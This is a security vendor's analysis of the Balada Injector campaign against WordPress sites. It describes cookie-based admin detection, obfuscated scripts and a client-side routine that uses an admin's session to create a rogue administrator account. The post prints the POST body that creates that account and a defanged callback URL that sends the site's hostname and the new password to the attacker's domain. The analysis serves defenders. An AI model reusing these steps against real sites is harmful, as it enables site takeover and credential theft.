GeoEdge’s Security team has uncovered a novel technique utilized by the Balada Injector. Balada Injector is known for its ability to exercise control over vulnerable websites, implanting malicious scripts that auto-redirect unsuspecting users to scam or adult pages. To evade detection, the attacker has implemented a filtering mechanism, which prevents automatic redirection when the website is accessed by an administrator.
Differing from the previous iteration of the attack, GeoEdge’s Security team has identified a novel technique employed by Balada Injector. Moriya Pedael, security researcher at GeoEdge revealed, that this technique achieves a full takeover of the website functionality and keeps persistence on vulnerable websites by creating a new admin user.
Targeting Users
In the past, the attacker directed the auto-redirect at innocent clients by ensuring the absence of two cookies, ‘wp-settings’ and ‘wp-settings-time.’
These cookies are built into WordPress, serving to customize the admin interface. If these cookies are present on the client’s page, it indicates that the client is an admin.
Presently, the attacker identifies admin clients by an additional cookie, in addition to the previously mentioned ones, or by monitoring the browser’s location.
Conditions Balada-Injector uses to detect an admin session:
- ‘wp-settings’ cookie is in the document. (legacy filter)
- ‘wp-settings-time’ cookie is in the document (legacy filter)
- ‘logged_in’ cookie is in the document.
- ‘wp-admin’ in window.location.href
- ‘wp-login.php’ in window.location.href
Additionally, Balada Injector now redirects users based on their OS type, ensuring the scam page is more relevant to the target. Below are figures to demonstrate it.
Persistence Control on Vulnerable websites
In the past, the attacker’s ability to maintain control over a website depended on exploiting existing vulnerabilities within the site. The greater the vulnerability, the more control they could obtain. Sometimes, the attacker used a combination of a few vulnerabilities, making control possible.
This process remained hidden from anyone except the attacker or the target website’s administrator, who could detect it by examining website logs or scanning files for infections.
Now, Balada Injector has adopted a new technique to gain persistence control. The injected script within the compromised website, deployed on the client side, exclusively targets administrators of the infected websites.
When an admin is connected, the script leverages the admin’s permissions to create a new admin account, ensuring ongoing access and the ability to reinfect the website even after it has been patched. To exclusively target administrators, the attacker employs the five detection mechanisms described earlier.
Static Analysis
Similar to the common Balada Injector pattern attack, the malicious script is obfuscated and utilizes functions like ‘eval’ and ‘String.fromCharCode’ to obfuscate the script, making it complex and challenging for humans or computers to decipher. These techniques are employed to evade lexical-based detection methods.
As you can see in the screenshot below, static detection methods can’t decide if the created script (by ‘eval’ function) is malicious, until connecting all the ascii numbers into a normal script or after it’s already known as malicious.
The embedded script created a new script that was taken from the malicious domain itself. the structure of this script path is:
hxxp://{malicious_domain}/src/page.js
This script is also obfuscated and has the encoding technic described above.
The flow of the ‘page.js’ script:
The filtering mechanism is executed first, and if the connected client is identified as an admin (possessing the ‘wpsapiadmin’ cookie), the ‘create-user’ dynamic script is initiated.
The Malicious ‘Create-User’ Script:
Once the attacker identifies the client as an admin, they ensure that the targeted website has not already been compromised by checking the website’s users. A request is made to ‘/wp-admin/users.php’ to check if a foreign admin user (the user to be created during the successful phase) exists. The malicious admin created in this attack is ‘greeceman.’
If it does not exist, the attacker makes another request, this time to ‘/wp-admin/user-new.php’ to get a ‘wp-nonce’ to create a new user.
A WordPress nonce serves as a unique security code that safeguards URLs and forms against harmful attacks. It assists WordPress in verifying the legitimacy of a request, thus preventing unauthorized actions and inputs.
After obtaining the nonce, the attacker sends another request to ‘/wp-admin/user-new.php,’ this time as a POST request with the following header ‘application/x-www-form-urlencoded’ and body values:
action=createuser
_wpnonce_create-user={the_created_nonce}
user_login=greeceman
email=greeceman@mail.com
pass1={random_created_password}@
pass2={random_created_password}@
role=administrator
The final request is a GET request with the fallen domain (window.location.hostname) and the created password as query params. Sending this information back to the attacker domain.
A query parameter is a piece of information appended to the end of a URL, typically following a question mark.
The final request is:
hxxps://{maliciousDomain}/set.php?z={locationHostname}-p-{userPassword}@
At the time of writing, the domain found delivering this script is decentralappps[.]com
Attribution of the persistence code to Balada injector
There are a few characteristics we found in our analysis that outrightly attribute this campaign to Balada Injector:
- The domain found delivering the malicious code is also delivering the final stage of Balada Injector common redirect attack.
The figures 1,2 are examples of redirect pages this domain is leading. - Obfuscated script with ‘eval’ +’ String.fromCharCode’ functions
- Same Admin filtering\ targeting mechanism.
GeoEdge is in contact with compromised sites, and our research into this attack is ongoing. Stay informed about the latest trends and emerging threats by keeping up to date. Reach out to the GeoEdge team for immediate support!
